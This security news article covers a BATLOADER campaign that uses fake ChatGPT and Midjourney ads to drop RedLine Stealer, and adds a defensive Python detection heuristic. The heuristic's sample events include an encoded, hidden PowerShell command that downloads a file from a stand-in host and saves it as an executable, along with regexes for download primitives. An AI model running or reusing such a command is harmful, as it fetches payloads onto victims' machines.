Malicious Google Search advertisements are being used in a BATLOADER campaign to direct users to dubious websites offering generative AI services such as OpenAI ChatGPT and Midjourney. The advertisements, flagged by eSentire, exploit the popularity of AI services that have no first-party standalone desktop application: the threat actors steer people looking for such an app to imposter web pages promoting fake ones.
BATLOADER, a loader malware, spreads through drive-by downloads. Users who search for keywords related to these AI tools are shown fraudulent ads, and clicking on one redirects them to a rogue landing page hosting the malware. The installer it serves contains an executable file and a PowerShell script that downloads and loads RedLine Stealer from a remote server. After installation, the binary uses Microsoft Edge WebView2 to load the legitimate ChatGPT and Midjourney URLs in a pop-up window, so the victim sees the expected service and has little reason to become suspicious.
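The chain above leaves a distinctive trace in process-creation telemetry: an application installed moments earlier spawns PowerShell with a download primitive pointing at a remote host, and the same parent also launches the WebView2 runtime (msedgewebview2.exe) to display the real service. The following Python hunting heuristic correlates those two children under one parent. It is an added example written for this page, not code or detection content from eSentire; the event field names, package path, host names and the sample events are all constructed, and the `-EncodedCommand` decoding is included because loader scripts are often launched that way rather than in clear text.

```python
"""Hunting heuristic for the BATLOADER-style chain described above (added example).

Flags a parent process that (a) spawns powershell.exe/pwsh.exe whose command
line (after decoding any -EncodedCommand payload) uses a download primitive
with a remote URL, and (b) also launches the WebView2 runtime. Either signal
alone is common in benign software; the pair under one parent is the lure.
Event schema and sample events are constructed, not real telemetry.
"""
import base64
import re
from collections import defaultdict

# PowerShell download primitives commonly seen in loader scripts.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"downloadfile|downloadstring|downloaddata|start-bitstransfer",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# powershell.exe accepts -e, -ec, -enc and -encodedcommand for the same switch.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

POWERSHELL = {"powershell.exe", "pwsh.exe"}
WEBVIEW2 = "msedgewebview2.exe"


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def effective_command(cmdline: str) -> str:
    """Command line plus whatever an encoded command expands to."""
    return cmdline + " " + decode_encoded_command(cmdline)


def image_name(image: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def download_urls(text: str) -> list[str]:
    """URLs referenced by a command that uses a download primitive; [] otherwise."""
    if not DOWNLOAD_RE.search(text):
        return []
    return URL_RE.findall(text)


def find_batloader_like(events: list[dict]) -> list[dict]:
    """Return parents that have both a downloading PowerShell child and a WebView2 child."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for parent in events:
        urls, has_webview = [], False
        for child in children[parent["pid"]]:
            name = image_name(child["image"])
            if name in POWERSHELL:
                urls += download_urls(effective_command(child["cmdline"]))
            elif name == WEBVIEW2:
                has_webview = True
        if urls and has_webview:
            findings.append({"pid": parent["pid"], "image": parent["image"],
                             "urls": sorted(set(urls))})
    return findings


# Constructed sample telemetry. The encoded payload is built here so the
# example stays readable; the host name is a reserved .invalid domain.
_ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile('http://update.example.invalid/r.bin','r.exe')"
    .encode("utf-16-le")
).decode()
_WEBVIEW_IMAGE = r"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.0.0\msedgewebview2.exe"
_PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Hypothetical fake "ChatGPT" app installed as a package (path is constructed).
    {"pid": 200, "ppid": 100, "cmdline": "ChatGPT.exe",
     "image": r"C:\Program Files\WindowsApps\ChatGPT_1.0.0.0_x64__example\ChatGPT.exe"},
    {"pid": 201, "ppid": 200, "image": _PS_IMAGE,
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"pid": 202, "ppid": 200, "image": _WEBVIEW_IMAGE,
     "cmdline": "msedgewebview2.exe --embedded-browser-webview=1"},
    # Benign: an admin downloads a tool from a shell; no WebView2 sibling.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 301, "ppid": 300, "image": _PS_IMAGE,
     "cmdline": "powershell.exe Invoke-WebRequest https://www.example.com/tool.zip -OutFile tool.zip"},
    # Benign: a desktop app that embeds WebView2 but never spawns PowerShell.
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\SomeApp\SomeApp.exe", "cmdline": "SomeApp.exe"},
    {"pid": 401, "ppid": 400, "image": _WEBVIEW_IMAGE,
     "cmdline": "msedgewebview2.exe --embedded-browser-webview=1"},
]

if __name__ == "__main__":
    for f in find_batloader_like(SAMPLE_EVENTS):
        print(f"suspicious parent pid={f['pid']} {f['image']} -> {f['urls']}")
```

Only the fake ChatGPT app (pid 200) is reported: the admin's inline download has no WebView2 sibling, and the legitimate WebView2-embedding app never runs PowerShell. On real EDR data you would feed the same per-parent correlation with process events from a short time window rather than a static list, and treat a parent image under a freshly created package directory as an additional signal.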
This isn't the first time BATLOADER's operators have exploited the AI trend to distribute malware. In March 2023, eSentire reported similar attacks using ChatGPT lures to deploy Vidar Stealer and Ursnif. The use of Google Search ads for this purpose has decreased since early 2023, indicating that measures have been taken to minimize their exploitation.
These developments are part of a broader wave of phishing and scam campaigns capitalizing on the increasing use of AI tools. Threat actors distribute malware and fake apps through these campaigns. In related research, Sophos identified ChatGPT-related fleeceware apps in the Google Play and Apple App Store, which manipulate users into signing up for unwanted subscriptions.
In January, eSentire traced one of the key operators of the BATLOADER malware-as-a-service (MaaS) operation to an individual in Montreal, Canada. A second threat actor associated with the group has been identified as a Romanian national known as "Jack."